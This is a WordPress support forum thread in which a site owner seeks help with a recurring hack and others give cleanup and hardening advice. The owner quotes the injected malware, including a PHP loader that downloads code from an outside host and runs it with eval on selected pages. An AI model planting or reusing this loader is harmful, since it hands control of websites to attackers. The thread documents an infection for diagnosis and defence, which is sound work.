http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
And when you’re done:
http://codex.wordpress.org/Hardening_WordPress
Just in case you haven’t read everything.
Do you have access to server access logs? Look at the timestamp for your index.php file to see exactly what time it was altered.
Compare that to your access logs to see where it was being altered from.
Quite possible, someone has inserted a rogue file deep on your server somewhere that keeps allowing access to your files.
thats what happened to me. I had 2 files, neither in my WP install….they were hidden good
Hey,
I followed the re-install and hardening instructions after the first attempt. I think I have access to server logs, I will see if they help!
Thanks..
I bet they will….I’ve seen this fix help many people. After you track down, and delete the rogue files…go through the process of changing passwords again. Maybe reinstall WP, also….reinstall all plugins, they can get dirty too. And your themes either reinstall or clean up.
RVoodoo knows of what he speaks – do everything he has mentioned diligently
I’ve tried to block access to some IPs and .ru domains by .htaccess but this gets overwritten with each WP update or editing of permalinks. This seems an area to be addressed by the developers.
@starapple — be sure you don’t put your .htaccess tweaks between the # BEGIN WORDPRESS and # END WORDPRESS lines of the file.
First of all, you should be running a firewall.
WordPress Firewall SEO
You also need: WP Security Scan
and: WP-DBManager
I will follow the above.
Index.php was compromised again today…
I have deleted a ton of old stuff from my server, including numerous scripts etc. which may have been used to get in.
Checking access logs.. I found the entry of the malicious file and it came from my IP so I’m not sure why thats the case – my machine is clean.
Guys,
I need help. I can’t stop this! I have done everything that’s been suggested and then some.
My index.php’s are no longer been compromised, but instead now, somehow my header.php is being edited with the following line being inserted at the top:
<? eval(file_get_contents(“/my directories/wp-content/751b80d2ef316f0a050bbc2867bc028f”)); ?>
It happened yesterday, but the file was placed in a different WordPress directory.
Previous to that, these type of files were being placed in my directories at root level.
We have checked FTP logs, but there is absolutely nothing. Myself and one other person has admin/FTP access. The other guy only has access to our WordPress folder and not root.
There is nothing malicious on my machine I don’t believe – I’ve done spyware tests etc.
I dont know what to do, I cant stop this, and its happening everyday, and the script can seemingly be inserted into any directory on my server and any file can seemingly be edited to reflect where this is.
I’ve changed passwords, made sure dirs are chmod correctly, deleted unwanted items etc. but I just can’t stop this and its killing my Website and my search engine standings.
Can someone please help or offer suggestions on anyone who could help? I can’t do anymore on my end that I know of..
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
I have done everything that’s been suggested and then some.
We have checked FTP logs, but there is absolutely nothing. Myself and one other person has admin/FTP access. The other guy only has access to our WordPress folder and not root.
I have deleted a ton of old stuff from my server, including numerous scripts etc. which may have been used to get in.
There is no easy fix, and did you really do what RVoodoo and Samboll said to do?
Try this:
Make a complete file and database copy of your blog and put that somewhere safe. Export your database to a WXR file and keep that in a safe place too.
Take a deep breath. Now with those backups and WXR files preserved safely, DELETE YOUR WORDPRESS DATABASE AND ALL-OF-YOUR-FILES-AND-DIRECTORIES ON YOUR WEB SERVER THAT YOU BACKED UP.
Bet that got your attention?
Since this keeps coming back, you are not getting the infected files. Or the PC you are accessing this via really is compromised too. Once it’s all deleted download fresh copies of everything from the source and do not touch your backup.
Get WordPress running and import the WXR file into your new blank blog. Only use the file backup for jpegs, images, etc. that are referenced in your blog.
If all that does not work, get a beer, relax for a while and then solicit help from jobs.wordpress.net for this problem.
Good luck.
Edit: Oh, and using a text editor, examine the WXR (don’t modify it!) for any compromised links too. If the hack is in your export, then putting that back would be bad. Make sure it’s clean too.
Keep in mind that it might be the way your server is set up and could have nothing to do w/ WordPress. Maybe you should contact your hosting company tech support (unless that is you).
So you set up the Firewall and followed all the suggestions in WP Security Scan, and you uploaded a fresh copy of all of the WP files and your config file? You can also use WP DB Manager to optimize and repair the database as well as to back it up, and you can use it to empty or drop tables from the database.
I tried once to export a WP site’s data and then import it but it didn’t work very well at all. It imported the categories but not the content.
Personally I would exhaust all support options before deleting the database. Deleting the files is no big deal. You can re-upload them any time. You can even upload them to a different domain or folder and then run two lines of code to make the database recognize the new URL.
Another thing you could do rather than deleting your database is create a new one and modify your config file to point to it. Either way you would have to initialize the database to build the tables but you would still have a way to access your previous data. Aside from completely deleting the database you can also drop tables or just empty the tables. The advantage of the former is that you would not have to modify your config file and the advantage of the latter is that you also would not need to initialize the database. Just throwing all the options out there.
If you’re doing any of this on a small site your best bet might be to copy & paste your content back in w/ the editor in HTML mode. That way you could check for any wacky code in the content. You can save the code for each page in a text file and then put it back into your clean database.
Try hosting support before trying any of this drastic stuff.
Happened again.
this time actual links were also inserted into footer.php. So thats header.php, footer.php, and index.php in root that have all been modified now.
I have disabled FTP access completely to see if this stops the problem. I have gone through all the steps as advised apart from your suggestions jdembowski – bit scared to do that and really dont have time to now I’ve started a new job!
I tried posting at wordpress jobs but it’s really annoying me because my post won’t go through properly – keeps saying my spam answer is wrong, when it’s not. Tried a lot of times now.
I’ve had it with this and don’t know what to do anymore. Would anyone here be so kind as to take a look? I don’t mind paying if it can be solved – I just have no time to deal with this anymore and I’m quite desperate.. it’s also killing my search engine rank and traffic in general.
I’ll be forever greatful if someone can help out..
Usually the hacked file just contains divs and viagra link, but this one today contained:
<?
$dir ='6845734';
$pages = 'www.wrestling-edge.com
www.wrestling-edge.com/mma-news
www.wrestling-edge.com/mma-news/brock-lesnars-next-ufc-fight-against-shane-carwin-cancelled.html
www.wrestling-edge.com/mma-news/chuck-liddell-and-mma-come-to-the-simpsons-this-sunday-night.html
www.wrestling-edge.com/search/kelly+kelly+naked
www.wrestling-edge.com/search/mickie+james+ass+pics
www.wrestling-edge.com/site
www.wrestling-edge.com/site/advertise
www.wrestling-edge.com/wrestling-ppv-coverage
www.wrestling-edge.com/wrestling-videos
www.wrestling-edge.com/wwe-news/chyna-in-a-japan-hall-of-fame-update-on-mickies-country-music-more.html
www.wrestling-edge.com/wwe-news/raw-going-to-three-hours-wrestlemania-2011-location-more.html
www.wrestling-edge.com/wwe-news/spoiler-smackdown-elimination-chamber-match-revealed.html
www.wrestling-edge.com/wwe-news/the-rock-hints-at-wwe-return-says-he-wants-to-do-more-than-guest-host-raw.html
www.wrestling-edge.com/wwe-news/wwe-smackdown-vs-raw-2010-road-to-wrestlemania-storyline-info.html
www.wrestling-edge.com/wwe-results/wwe-raw-results-october-5th-2009.html
www.wrestling-edge.com/wwe-results/wwe-royal-rumble-2010-ppv-results.html
';
@eval(@file_get_contents('http://file-upload.co.cc/'.$dir.'/'.md5($page)));
$c_url = 'http://file-upload.co.cc/'.$dir.'/'.md5($page);
$pages=explode("\r\n",$pages);
$url=trim(str_replace('www.','',$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']));
$url=str_replace('/','',$url);
foreach($pages as $page){
$page=trim(str_replace('www.','',$page));
if ($url==str_replace('/','',$page)){
if(ini_get('allow_url_fopen')==1){
@eval(@file_get_contents('http://file-upload.co.cc/'.$dir.'/'.md5($page)));
}
else{
if(function_exists('curl_init')){
$ch = curl_init();
$c_url = 'http://file-upload.co.cc/'.$dir.'/'.md5($page);
curl_setopt($ch, CURLOPT_URL, $c_url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$data = curl_exec($ch);
@eval($data);
}
}
break;
}
}
?>
Weirdly, it still produced the same output on google’s cache for the Website. The links in footer.php were just standard href tags to numerous viagra and the like sites.
